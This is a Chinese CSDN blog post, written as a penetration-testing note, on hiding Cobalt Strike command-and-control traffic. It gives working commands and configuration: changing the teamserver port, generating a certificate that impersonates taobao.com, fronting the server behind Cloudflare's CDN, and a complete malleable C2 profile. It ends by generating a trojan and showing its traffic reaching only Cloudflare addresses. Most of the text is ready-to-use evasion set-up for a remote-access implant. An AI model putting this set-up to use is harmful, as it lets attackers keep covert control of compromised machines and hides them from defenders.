【渗透测试笔记】之【内网渗透——CS流量隐蔽】

最新推荐文章于 2024-05-07 14:11:16 发布
最新推荐文章于 2024-05-07 14:11:16 发布
阅读量4.5k 收藏 5
点赞数
分类专栏: 渗透测试 Cobalt Strike 内网渗透 文章标签: windows 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/121468185
版权

文章目录

1. 修改端口特征

vim teamserver

将默认端口修改:

-Dcobaltstrike.server_port=54321

2. 修改证书特征

删除原有证书(第一次启动会生成cobaltstrike.store),创建新证书cobaltstrike.store

rm cobaltstrike.store

keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=”taobao.com“, O=“Sofatest”, L=Beijing, ST=Cyberspace, C=CN"

keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12

keytool -list -v -keystore cobaltstrike.store

2. 配置CDN

这里使用cloudflare的CDN。

  1. 添加A记录
    在这里插入图片描述
  2. 添加C记录(可选)
    在这里插入图片描述
  3. 在购买域名的站点上将域名服务器更改为CloudFlare的域名服务器
    在这里插入图片描述
    在这里插入图片描述
  4. 打开AlwaysOnline和开发者模式
    在这里插入图片描述

在这里插入图片描述

3. 生成自定义配置文件

cs.profile:

#default Beacon sleep duration and jitter
set sleeptime "5000"; 
set jitter    "20";

https-certificate {
    set keystore "cobaltstrike.store";
    set password "123456";
}
http-stager {
    set uri_x86 "/api/1";
    set uri_x64 "/api/2";
    client {
        header "Host" "xxx.xxxx.tk";}
    server {
        output{
        print;
        }
    }
        }
http-get {
    set uri "/api/3";
    client {
        header "Host" "xxx.xxxx.tk";
        metadata {
            base64;
            header "Cookie";
        }
        }
    server {
        output{
        print;
        }
    }
        }
http-post {
    set uri "/api/4";
    client {
        header "Host" "xxx.xxxx.tk";
        id {
            uri-append;
        }
        output{
        print;
        }
    }
    server {
        output{
        print;
        }
    }
}

4. 效果演示

启动服务端

./teamserver xx.xx.xx.xx Password cs.profile

  1. 创建http监听器
    CloudFlare CDN支持的http端口:80,8080,8880,2052,2082,2086,2098。
    在这里插入图片描述

  2. 生成木马
    在这里插入图片描述

  3. 上线
    在这里插入图片描述

  4. 查看流量发现目的ip为cloudflare的cdn服务器
    在这里插入图片描述

AA8j
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Python之渗透测试笔记(五) ——Requests模块
12-21
request中文手册:https://requests.readthedocs.io/zh_CN/latest/ Requests模块Requests模块简介Request模块的7个主要参数Response响应内容定制请求头POST请求cookiesession会话请求与响应 Requests模块简介 request模块是python的第三方库,主要功能如下: Keep-Alive & 连接池 国际化域名和 URL 带持久 Cookie 的会话 浏览器式的 SSL 认证 自动内容解码 基本/摘要式的身份认证 优雅的 key/value Cookie 自动解压 Unicode 响应体 HTT
渗透测试学习笔记之案例一.pdf
04-06
渗透测试学习笔记
记一次监测到CS流量的应急响应
最新发布
maxiluo的博客
05-07 397
据消息得知,某事业单位一网通系统收到网信办通报,监测到Cobalt Strike HTTp Beacon心跳/拉取命令动作,我方接到通知立刻展开应急处置。经过以上排查可知,服务器于****年*月**日之前受到攻击,被上传相关的CS木马,对数据库进行排查,未见保留的大规模数据数据泄漏记录,现已经可疑程序清除,不排除攻击者有其他权限维持的手段,结合上述异常状态,建议对服务器下线进行全面排查,必要情况下对服务器进行重做。
CobalStrike(CS)上线隐藏IP和流量
懂进攻知防守
08-06 2092
使用CDN内容分发网络的多节点分布式技术,通过“加速、代理、缓存”隐藏在后面的静态文件或服务;最终实现对外暴露的是CDN多节点的公网域名IP,很难甚至无法溯源真实后端服务器的域名或IP!......
渗透工具CS安装
不眠的博客
06-08 1521
CS是一个常用的渗透测试工具,全称为“Cobalt Strike”,它是一款针对渗透测试和红队操作而设计的工具,主要用于模拟攻击和检测网络安全漏洞。使用CS进行渗透测试需要遵守相关法律法规和道德规范,否则将会产生严重后果。将下载的cs,将文件夹上传到 vps中或者kali。执行teamserver文件,安装启动cs服务端。cs服务端:kaili或者vps。0x4.cs客户端启动。cs客户端:win11。解压密码123456。配置环境Java环境。
web安全进阶 - - - 流量隐藏
weixin_67503304的博客
09-14 1933
通过利用CDN的方法进行流量隐藏,同时也详细讲解了一下cloudflare域名购买的方式。
cs流量特征隐藏
renyizou的博客
11-16 1592
转载mark一下 https://xz.aliyun.com/t/9542https://xz.aliyun.com/t/9542
万字渗透测试入门知识点,自学查漏补缺
yjwangan的博客
10-24 1002
万字渗透测试入门知识点,自学查漏补缺
CDN和域名隐藏C2地址
milu_Sec的博客
12-30 1094
准备:服务器⼀台cdn运营商域名靶机上只会有跟cdn的ip通信的流量,不会有跟真实C2通信的流量,可以保护C2的ip第⼀步:⾸先,注册cloudflare.com,cloudflare这是什么东西呢,它可以给你的网站添加CDN,CDN就是当不同地区的用户访问你网站时,就近访问最近的服务器获取数据。而且这个网站还是最快的DNS服务,关键它!添加站点选择免费的当前页面显示的是cloudflare发现的现有解析记录数据所以这里要注意去对比一下是否有缺少的解析记录(一般不会缺少)。然后点继续。
内网渗透之隐藏通信隧道技术
qq_48904485的博客
04-27 5081
一、隐藏通信隧道基础知识 1、隐藏通信隧道概述 一般的网络通信,先在两台机器之间建立TCP连接,然后进行正常的数据通信。在知道IP地址的情况下,可以直接发送报文;如果不知道IP地址,就需要将域名解析成IP地址。在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至人侵检测系统来检查对外连接的情况,如果发现异常,就会对通信进行阻断。 这里的隧道,是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据
渗透框架进阶之流量隐藏
weixin_56378389的博客
06-15 476
msf,cs流量隐藏
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
python之渗透测试笔记(一)
01-20
python之渗透测试(一)—— Socket模块Socket模块须知简介基本用法使用Socket编写一个简单的服务端和客户端 Socket模块须知 在TCP/IP协议族中,Socket并不是协议,而是一个编程接口。 TCP/IP是传输层协议,主要解决...
渗透测试学习笔记之案例二.pdf
04-06
渗透测试学习笔记
渗透安全测试
热门推荐
龙卷风摧毁停车场
10-09 1万+
CTF 内网攻防 ssh私钥泄漏 信息探测 -nmap -sV 目标IP 1.分析端口,针对特殊端口进行探测,对开放大端口的http服务进行排查 2.针对http服务可以使用web进行测试http://ip:port 3.右键查看网页源代码 4.使用工具dirb http://ip:port/ 对服务的隐藏文件进行探测 查看敏感醒目的文件名进行访问可能会获取flag值 可以直接下载ssh私钥,进行配对,进入ssh文件夹下的私钥文件,关键名文件进行下载 给私钥可读可写权限,进入关键名文件下查看用户名等敏感信
【内网安全】——CS操作指南(二)
Demo不是emo的博客
02-03 3973
cs操作指南三部曲第二部——cs功能讲解
[钴击]Cobalt Strike内网渗透工具
qq_60115503的博客
09-04 1328
1.添加新的Cobalt Strik团队服务器2.删除当前的Cobalt Strik团队服务器3.新建一个监听器4.切换图形化会话按钮5.切换列表话会话按钮6.以列表方式显示目标7.密码凭证栏按钮8.下载文件列表9.键盘记录表10.屏幕截图表11.生成windows下可执行木马12.生成java签名的applet攻击13.生成office宏攻击14.生成powershell后门15.文件托管按钮16.管理web站点17.帮助文档18.关于。
渗透测试试题-----web方面知识点
Z_X_L_的博客
07-24 1万+
本文转自这篇文章 00 前情提要 01 Web相关知识点 1.漏洞类 2.情景类 3.其他类 00 前情提要 本文仅为个人整理汇总,其试题来源于各个平台,其中包括CSDN、Github、吾爱破解论坛等。为个人复习所用,现整理分享给大家。 01 Web相关知识点 1.漏洞类 1、常见的Web安全漏洞有哪些? SQL注入 XSS 文件遍历、文件上传、文件下载 垂直越权、水平越权 逻辑漏洞 2、SQL注入漏洞 SQL注入的原理: 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服
内网渗透测试:隐藏通讯隧道技术(上)
weixin_46236101的博客
10-06 628
什么是隧道? 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。 常用的隧道技术有以下三种: 网络层:IPv6 隧道、ICMP 隧道 传输层:TCP 隧道、UDP 隧道、常规端口转发 应用层:SSH 隧
渗透测试笔记本电脑推荐
07-28
根据引用\[1\],Kali Linux是一个以安全为核心理念的操作系统,它预装了大量的渗透测试软件,并且在硬件方面也有了很大的提升,支持大量的桌面环境。因此,如果你想购买一台渗透测试笔记本电脑,推荐选择一台能够运行Kali Linux的设备。你可以选择一台配置较高的笔记本电脑,以确保它能够满足运行Kali Linux和其他渗透测试工具的要求。此外,根据引用\[2\],SecLists是一份非常有用的列表集,可以帮助渗透测试员快速完成任务,因此你可以将其作为参考资源。另外,根据引用\[3\],OWASP ZAP是一款应用测试工具,适合应用安全新手使用。因此,你可以考虑在渗透测试笔记本电脑上安装OWASP ZAP,以帮助你进行应用测试。 #### 引用[.reference_title] - *1* [最受欢迎的14款渗透测试工具](https://blog.csdn.net/yangwenxue_admin/article/details/93978894)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [18款好用的网络安全渗透测试工具推荐](https://blog.csdn.net/2201_75362610/article/details/129241378)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值